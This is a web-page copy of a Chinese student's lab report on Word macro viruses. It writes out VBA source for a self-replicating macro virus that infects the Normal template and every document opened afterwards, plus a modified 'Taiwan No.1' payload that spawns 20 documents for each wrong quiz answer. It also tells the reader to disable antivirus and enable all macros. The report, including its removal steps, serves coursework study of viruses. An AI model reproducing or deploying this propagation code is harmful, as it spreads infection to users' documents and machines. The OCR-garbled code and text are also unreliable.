林冠臣计算机病毒防范_第1页
林冠臣计算机病毒防范_第2页
林冠臣计算机病毒防范_第3页
林冠臣计算机病毒防范_第4页
林冠臣计算机病毒防范_第5页
已阅读5页,还剩6页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、计算机病毒与防范技术学院:信息技术学院班级:b1204学号:0913120414姓名:林冠臣计算机宏病毒分析及清除实验一、实验目的1了解“宏病毒”机理。2. 掌握清除宏病毒的方法。3. 掌握采用“宏”和脚本语言进行编程的技术。二、实验环境1 .windows xp操作系统。2.office word 2010 字处理软件。三、实验要求1. 宏的编写。2. 理解宏病毒的作用机制。四、实验内容与步骤:1. 软件设置首先检查电脑里杀毒软件是否开启,如果开启需要关闭它。然后打开一个word 文档(我直接打开的“计算机宏病毒分析及清除实验”),依次单击“文件” “选项”,然后在弹出的“word选项”对话

2、框中单击“信任中心”,然后再单击 “信任中心设置”“宏设置” o选择“启用所有宏”,“信任对vba工程对象 模型的访问”。2宏病毒实现自我复制功能打开一个word文档(我打开的“计算机宏病毒分析及清除实验”),然后按 alt+fll调用宏编写窗口,在左侧菜单栏中依次单击“project (计算机宏病毒分析 及清除实验)” "microsoft word对象” "thisdocument”,在这里输入实验 代码单击“保存”,这时该文档就含有了宏病毒,然后单击“执行”,就立刻弹出 一个窗口,第二次打开该文档,就自动执行以上代码,并将自身复制到normal, dot 和当前文档的

3、thisdocument中,此时所有的word文档关闭时,都将运行以上的 病毒代码,产生影响。我乂新建立了一个名字为“111”的word文档,打开后关 闭就弹出一个捉示框。代码如下:* macro-1: micro-virussub document_open()on error resume nextapplicat ion. displaystatusbar = falseoptionssavenormalprompt = falseset ourcodernodule = thisdocumcntvbproject. vbcomponents(1)codemoduleset host =

4、 normaltemplate. vbproject. vbcomponents(1). codemoduleif thisdocument 二 normaltemplate thenset host = activedocument. vbproject. vbcomponents (1)codemoduleend ifwith hostif . lines(1, 1) <> micro-virus" thendeletelines 1, countoflines tnsertlines 1, ourcodemodule lines(1, 100).replacelin

5、e 2, "sub document close ()if thisdocumcnt = normaltemplate then.replaceline 2, "sub document_0pcn ()z,activedocument. saveas activedocument. fullnameend ifend ifend withmsgbox b1204-林冠臣-14end sub结果显示如下:fftea ®少 a aa猜入 芙面為*? 可用 谿 亩爲 視圉雯ai;三疋?=««se20i!本: 4.177个字符闵认值).计算micros

6、oft word防范技术”上图为复制完代码保存后,单击执行的结呆图上图为模板被感染病毒的结果图上图为新建文档“111”被感染病壽结果图3具有一定破坏性的宏本程序是以著名宏病毒“台湾一号”的恶意代码部分为基础,对源代码进行了 适当的修改,这样降低了破坏性,否则实验室机器将受到严重影响。它的环境和 操作方法与上面的相同。代码如下:rmacro_2: moonlightdim nm(4)sub document_open()disableinput 1set ourcodemodule = thisdocument.vbproject.vbcomponents( 1 ).codemoduleset

7、host = normaltemplate.vbproject.vbcomponents(l).codemoduleif thisdocument = normaltemplate thenset host = activedocument.vbproject.vbcomponents(l).codemoduleend ifwith hostif .lines(l, 1) <> n'moonlight" then.deletelines 1,countoflines.insertlines 1, ourcodemodule.lines(l, 100) .repla

8、celine 3, "sub document_close()"if thisdocument = nonnaltemplate then.replaceline 3, "sub document_open()uactivedocument.saveas activedocument.fullnameend ifend ifend withcount = 0ifyear(now() = 2015 thentry:on error goto trytest = -1con = 1tog$ = ,hi = 0while test = -1for i = 0 to 4n

9、m(i) = int(rnd() * 10)con = con * nm(i)if i = 4 thentog$ = tog$ + str$(nm(4) + "=?"goto begend iftog$ = tog$ + str$(nm(i) +next ibeg:beepans$ = inputbox$(h今天是” + date$ + “,跟你玩一个心算游戏” + chr$(13) +喏你答错,只好接受震撼教育” + chr$(13) + tog$, “台湾no.l macro virus")if rtrim$(ltrim$(ans$) = ltrim$(str

10、s(con) thendocuments-addselection.paragraphs. alignment = wdalignparagraphcenterbeepwith selection.font.name = ”细明体”.size = 16.bold = 1u nderline = 1end withselection.insertafter text:="何谓宏病毒”selection.insertparagraphafterbeepselection.insertafter text:="答案:"selection.font.italic = 1s

11、election.insertafter text:=h我就是"selection.insertparagraphafterselection.insertparagraphafterselection.font.italic = 0beepselection.insertafter text:="如何预防宏病毒"selection.insertparagraphafterbeepselection.insertafter text:="答案:"selection.font.italic = 1selection.insertafter tex

12、t:=n不要看我”goto outelsecount = count + 1for j = 1 to 20beepdocuments.addnext jselection.paragraphs. alignment = wdalignparagraphcenterselection. insert after text:="宏病毒"if count = 2 then goto outgoto tryend ifwendend ifout:end sub确定取消结果显示如下:2015-04-27,跟你玩y心算游戏台湾no.l macro virus7* 5* 5* 2* 3=

13、?上图为打开被感染病毒的word文档弹出的窗口上面两个图是计算错误后出现的结果。新建了 20个word文档,并月继续进行计算。,正=如何ftsfi宜霸爲答罠不ff倉赛.门 jgo 1上图为计算正确的结果图,即新建一个文档,并跳出字幕。<kr #« £* /11 艮wtq xp a 3 1azaxaabt aabb( aabb( aabb(4. 清除宏病毒(1) 打开受感染的word文档,按“alt+fll”进入宏编辑环境,将每个 “project”下的“this document"中的病毒代码删除然后保存。(2) 打开模板 anormal microsoft

14、 wordv 对象将"this document,中的病 毒代码删除然后保存。注意:清除病毒时候,先清除每个“project"内的代码,在最后一个被感染的文 档中删除模板内的代码,否则重新打开其他被感染病毒的文档,模板再次被感染。五、实验心得通过本次实验我实际感受到了宏病毒传播的可怕性,他会无限的循环,执行 恶意代码,也了解了它执行的基本流程。另外在试验小我遇见了几个问题实验我 认为应该注意以下几个问题:1. 实验时候首先要注意实验环境与给的参考资料环境是否一样,本次实验就 不一样,所以冇些步骤会稍冇不同,不能盲目的照着参考资料做实验,要具体研 究实验的原理,然后进行实验验证。2. 根据这个实验应该是被感染宏病毒后的文档在打开和关闭时候都有图框出 %,因为宏病毒在传播复制代码时候应该自动更改函数名,colse变为open,但 是我的实验只有在关闭文档时出现图框,在打开文档时并不出现,在逐条执行语 句时候也执行open 了但是具体原因还是令我困惑

人人文库> 全部分类> 生活休闲 > 科普知识

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论